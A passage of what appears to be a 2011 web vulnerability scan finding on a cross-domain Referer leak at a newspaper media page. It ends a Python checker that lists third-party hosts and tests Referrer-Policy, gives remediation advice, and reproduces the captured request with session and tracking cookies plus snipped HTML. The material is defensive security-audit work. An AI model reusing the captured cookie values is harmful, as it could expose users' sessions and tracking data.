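    for raw in collector.links:
        target = urlsplit(urljoin(page_url, raw))
        # javascript:, mailto: and similar pseudo-URLs trigger no request.
        if target.scheme not in ("http", "https"):
            continue
        if target.netloc and target.netloc.lower() != own_host:
            hosts.add(target.netloc.lower())
    return sorted(hosts)


def policy_mitigates(headers):
    """True if the response's Referrer-Policy keeps the query string same-origin.

    Header lookup is case-insensitive; with a comma-separated list the last
    valid token wins, which is how browsers apply it.
    """
    value = next((v for k, v in headers.items() if k.lower() == "referrer-policy"), "")
    chosen = ""
    for token in (t.strip().lower() for t in value.split(",")):
        if token in VALID_POLICIES:
            chosen = token
    return chosen in QUERY_STRIPPING_POLICIES


def referer_leak_report(page_url, html, headers):
    """Reproduce the finding: query string present, cross-domain links, no stripping policy."""
    query = urlsplit(page_url).query
    hosts = cross_domain_targets(page_url, html)
    return {
        "query_string": query,
        "third_party_hosts": hosts,
        "leaks_query_string": bool(query) and bool(hosts) and not policy_mitigates(headers),
    }


# Constructed sample, assembled from fragments of the response on this page.
SAMPLE_URL = ("http://www.bostonherald.com/mediacenter/index.php"
              "?media_type_photo=0&media_type_video=1&media_type_audio=0")
SAMPLE_HTML = """
<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif">
<a href="/"><img src="/images/local.gif"></a>
<a class="alt" href="javascript:void(0);">Features</a>
<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">Follow Us</a>
"""
SAMPLE_HEADERS = {"Server": "Apache", "Content-Type": "text/html; charset=UTF-8"}

if __name__ == "__main__":
    report = referer_leak_report(SAMPLE_URL, SAMPLE_HTML, SAMPLE_HEADERS)
    print("query string :", report["query_string"])
    print("third parties:", ", ".join(report["third_party_hosts"]))
    print("leaks        :", report["leaks_query_string"])
```

Run against the constructed sample, the report lists ajax.googleapis.com, cache.heraldinteractive.com and www.facebook.com as Referer recipients and flags the leak because no Referrer-Policy is set. The Referrer-Policy header postdates this 2011 scan; today the fix is `Referrer-Policy: strict-origin-when-cross-origin` (or `no-referrer`) on the response, `rel="noreferrer"` on individual off-site anchors, and keeping secrets out of the query string in the first place, since a policy header only helps in browsers that honour it.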

Request

GET /mediacenter/index.php?media_type_photo=0&media_type_video=1&media_type_audio=0 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:57:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 339722

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Photos & Video - Boston
...[SNIP]...
<!-- Google hosts a compressed, cacheable version of Prototype -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>


                            <script src="http://cache.heraldinteractive.com/js/lightbox.js" type="text/javascript"></script>
                                <script src="http://cache.heraldinteractive.com/js/tooltips.js?fresh=283" type="text/javascript"></script>
...[SNIP]...
<![endif]-->


<link rel="alternate" title="Photos & Video - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/mediacenter/" type="application/rss+xml">

<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fmediacenter%2Findex.php%3Fmedia_type_photo%3D0%26media_type_video%3D1%26media_type_audio%3D0&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://buyheraldphotos.com">Buy Herald Photos</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
ideo" name="media_type_video" value="1" checked="checked" onclick=" if (this.checked == true) { updateData(this.name,1); } else { updateData(this.name,0); } " style="position:relative; top: 2px;" /><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniVideo.png" style="position:relative; top: 4px;" /> Video

&nbsp;

   <!--
<input type="submit" class="mediaTypeBtn " name="media_type" value="Audio" onclick="if($('media_type_audio').
...[SNIP]...
id="media_type_photo" name="media_type_photo" value="0" onclick=" if (this.checked == true) { updateData(this.name,1); } else { updateData(this.name,0); } " style="position:relative; top: 2px;" /><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPhoto.png" style="position:relative; top: 4px;" /> Photo

&nbsp;

</div>
...[SNIP]...
<div id="navPaneOverlay" ><img class="ajax_loader" src="http://cache.heraldinteractive.com/images/siteImages/icons/ajax-loader-big-blackBg.gif" /></div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay0" class="nowPlayingOverlay" width="40" style=" display: block; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay1" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay2" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay3" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay4" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay5" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay6" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay7" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay8" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay9" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay10" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay11" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay12" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay13" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay14" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay15" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay16" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay17" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay18" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay19" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay20" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay21" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay22" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay23" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay24" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay25" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay26" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay27" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay28" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
</a>

<img id="nowPlayingOverlay29" class="nowPlayingOverlay" width="40" style=" display:none; border: none;" border="0" src="http://cache.heraldinteractive.com/images/siteImages/mediacenter/nowPlayingThumbOverlay.png" />
               </div>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4884','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110128/stp/d3ff09_012811shutap01.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4880','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110128/stp/e5e8bf_012711snowtf12.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Snow piles up in Bay State"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Snow piles up in Bay State">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4874','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110127/stp/4bb523_012711collapsemg05.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Roof collapse in Lynn"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Roof collapse in Lynn">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4871','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110126/stp/db5172_012611snowtf10.jpg" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Snow, snow, snow..."><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Snow, snow, snow...">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4870','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110126/stp/e1e641_012511firems04.jpg" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Firefighter graduation"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Firefighter graduation">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4867','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110126/stp/8c0965_012511bulltf12.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Defenders"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Defenders">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4863','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110125/stp/732f60_012411homelessms06.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4777','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110104/stp/ee1234_010311celtsmw021.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4774','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110102/stp/940585_010211pats027.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4772','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110101/stp/d1d0a1_123110patriotsDR03.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4770','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110101/stp/467227_123110celticsmh15.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4763','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101231/stp/a92882_123010bchoopsms05A.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Boston College beats Northeastern 80-67"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Boston College beats Northeastern 80-67">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4761','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101231/stp/5d7332_123010patsjw09.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4866','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110125/stp/61e5f9_tgrit.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4859','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110123/stp/873e80_012211caesarap09.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4847','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110120/stp/ef8a2d_KateA012011.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4832','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110116/stp/e02b29_460f81914ea92f01e20e6a7067008cba.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4810','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110112/stp/e9644b_fash2.jpg" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Edge\\Patriot fashion"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Edge\\Patriot fashion">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4786','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110106/stp/c846a1_010511cirquear01.jpg" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Edge\\Cirque du Soleil"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Edge\\Cirque du Soleil">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4783','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110105/stp/4df46a_010311skating03.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Edge\\Fashion on ice"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Edge\\Fashion on ice">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4767','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110101/stp/2d898c_120810princessnl05.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Edge\\2010 in pictures"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Edge\\2010 in pictures">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4879','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110128/stp/ed2891_012711hastynl05.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Track\\Hasty Pudding"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Track\\Hasty Pudding">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
